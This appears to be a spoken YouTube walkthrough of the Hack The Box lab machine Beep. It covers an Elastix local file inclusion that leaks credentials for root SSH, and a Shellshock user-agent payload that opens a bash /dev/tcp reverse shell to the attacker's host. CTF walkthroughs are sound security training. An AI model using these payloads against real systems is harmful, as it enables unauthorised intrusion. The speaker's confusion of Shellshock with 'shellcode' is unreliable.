What is up, YouTube? My name is Dre, and today we're going to be talking about exploiting the machine Beep on Hack the Box. Beep is a relatively easy to medium machine, and in this video we're going to be talking about how we can exploit it using two methods, one of them being shellcode and the other one being local file inclusion. Okay, without further ado, let's crack straight into it. We've done our nmap scan by default scripts, the service enumeration on all ports. We see that there's a lot of services. I've enumerated most of them. Some of them are rabbit holes, some of them just you can't do anything with, but the ones we'll be focusing on today mainly is going to be port 80 and port 10,000 with the Webmin in there. Okay, so once we go into the website, we get a portal. I tried a couple of default credentials, looked at the source, nothing to go with here. And basically you find out it's elastics and you can't really do much with this at the moment. So when we go to our terminal, we search for elastics. Okay, we see there's a couple of exploits here, and the one that we're going to be focusing on is local file inclusion because it's fairly, one of the easiest ways to do it. And then we are going to look at the exploit 37637 -x is to look at the exploit. Elastics is open source software, established unified communication, blah blah blah, available at an enterprise level into a unique solution. Okay, we look at it, we have the author here, we have the version here, and we have the exploit here. So local file inclusion exploit works by entering the URL that they've discovered into the browser. They found a configuration error in the code in the current language script. So we just copy this. Okay, we paste this. Okay, happy, go here, and then obviously type in the URL. Whoops, I'm not sure if it's SSL 81. Oops, I messed up here, I pressed the wrong thing. Let's do it. Here we go, enter. Okay, sorry, attempt to access restricted file. Sometimes the portals and the website change certain areas of the script of the URL automatically. As you see here, we have AM portal config %00. Here, for some reason, it changes it to 2500. We change that to, sorry guys, 00, enter, and then we have a lot of information. You might be thinking, bloody hell, why is this all over the place? What do I see? What do I understand? When you enter something like this, what you want to do is go to the source page, and then it will organize it for you automatically. You can also cat it out into a txt file and just organize it all into one line, but here it's done it fairly nicely for us. So here we see that we have some information. So AMPMGR pass is a password, and another one which is the same as that, and once again another password for APM. So we have some good information here. You want to cat this all out, put it into a text file somewhere. This will come in handy. At the moment now we're just going to leave it here. So yeah, we're gonna, obviously we also know in our terminal, our nmap scan, there's SSH open as well. So let's go ahead and SSH into the system. So we see SSH root, and we copy the, obviously we do 10.10.10.10.7, enter. Oh, it says unable to negotiate 10.10.10.7 port 22, no matchy key found. The offer is this encryption. Okay, so when this happens, always read what the error is, and then it says you have to just basically use the Hellman group exchange to be able to negotiate with the server. So what do we do now? We simply just so I don't get this wrong, we SSH Hellman group. I think it should work like that. And then root at 10, 10, 10, 7. Nope, I did a mistake here. Exchange group 1, I think. Oh, this is where you have to like play around a little bit. Copy this one more time. SSH this at root at 10, 10, 10, 7. For some reason, it takes away the D. Okay, Diffie Hellman group exchange. Oh, so silly. So we have a comma. I didn't see the commas because I'm blind. Let's just go ahead and remove this. See if it works now. Nope. I think. Okay, we need to. Healthy Hellman group 1. Group exchange 1. We have to assign. I think it's this one here. Sorry for the inconvenience. So we say SSH O kex algorithms, yes, and we will choose the third one, Diffie Hellman group 1 dash SHA-1, and then root at 10, 10, 10, 7. Yes, thank God. And the password would be, I think it was this one. Or maybe not. Oh, yes, and we're in as root. Simple as that. LFI makes things life a bit easy. Just make sure you get the SSH key encryption correct. Make sure you type in the... Oh, look at the previous commands they've entered. And that's it, get the flag. Now we're going to go to shellcode and how we can get remote code execution via shellcode. Another thing here is you can also, since we're in the etc folder, we can, for example, look at the password. Okay, once again, view page source, and then you see the other units. We've got Fairness in here, we've got the MySQL root, and we can see the different users in here as well that we can separate if we wanted to do a brute force attack, for example. You can also look into the shadow file and other files that are in the system in the etc folder. So next is going to be shellcode execution. Okay, so with shellcode, it's going to be a bit more fun. Shellcode is a security bug that causes bash to execute commands from environment variables unintentionally. In other words, if exploited, the vulnerability allows the attacker to remotely issue commands on the server, also known as remote code execution, RCE. So this is going to be a bit more fun. Remember what I said in our initial scan, that we will be looking at port 80. So we exploit port 80 via LFI. Now we're going to do Shellshock. So we have Webmin here. We go to HTTPS 10.10.10.7, port 10,000, and we have the Webmin page. Tried a couple of default credentials, didn't work. You know, you could possibly brute force this if you want, especially now that you have username and password. But you know, we know that Webmin is a lot of times vulnerable to Shellshock, and because it uses a lot of CGI files that are vulnerable to it. Okay, so what we do is we have the page open. Let's just refresh it once. Okay, open a new tab. Let's see. Okay, do I still have access? Yes, I do. Okay, here we go. All right, boom. All right, let's, you know, burp suite this. Intercept is on. and we go back to our browser, refresh it, we forward. Okay, that was a lot of forwarding. All right, we have 3. We'll send the first one to repeater. Go to repeater. In repeater, Shellshock, we exploit the user. We change the user agent to exploit the system. So we can change this to a bash command of our own and send it. Since it's vulnerable to this, it should give us a response with the thing we want in there. Now, if you want to find out if it is vulnerable to Shellshock on a bug bounty, for example, that you're doing, one good way is to look if the sleep time works. So what we would do is we say parentheses, 2 dots, semicolon, sleep, let's say 5. Okay, so 1, 2, 3, 4, 5. That was approximately 6 seconds, so it should take 1 second more usually, and that's how you know with the response you get that you have Shellshock vulnerability on the target system. Now what we do is we basically type in our own bash command to give us RCE. But before we do that, all we need to do is do a netcat listener, and then we type in our command, our bash command. So bash I and dev tcp. This is going to be our reverse shell 10 10 14. What was it again? Check the, sorry about that. So, okay, 1449, so that's your local host, and then /8081 0 less than and 1. Okay, when we send this, we have root. Easy as that. Shellcode can be very, very dangerous. We have RCE just by sending in the request, and that's it. Once again, we're root. Remember, you can simply change this to a interactive shell by typing in python -c import pty do this bin bash quotations bracket, boom, good. This will give us an interactive shell, so that, you know, when we press tab we get autocomplete, right? 1 second, let me see. Alright, we don't have auto completion right now, so clear, it doesn't work. Okay, so we've set the Python, and then export term xterm. Oops, my bad. Export term equals xterm, and then Control Z to background, and then stty raw echo foreground. We go back in, and boom, we have interactive shelf. We can autocomplete and do all our stuff. Now all we need to do is cd ls, and we have the root flag cat root.txt. Boom, go to the home folder, desktop, and you should have the user. If you enjoyed this video, please do like, comment, subscribe. It will help me a lot, and thank you for watching. Have a good day.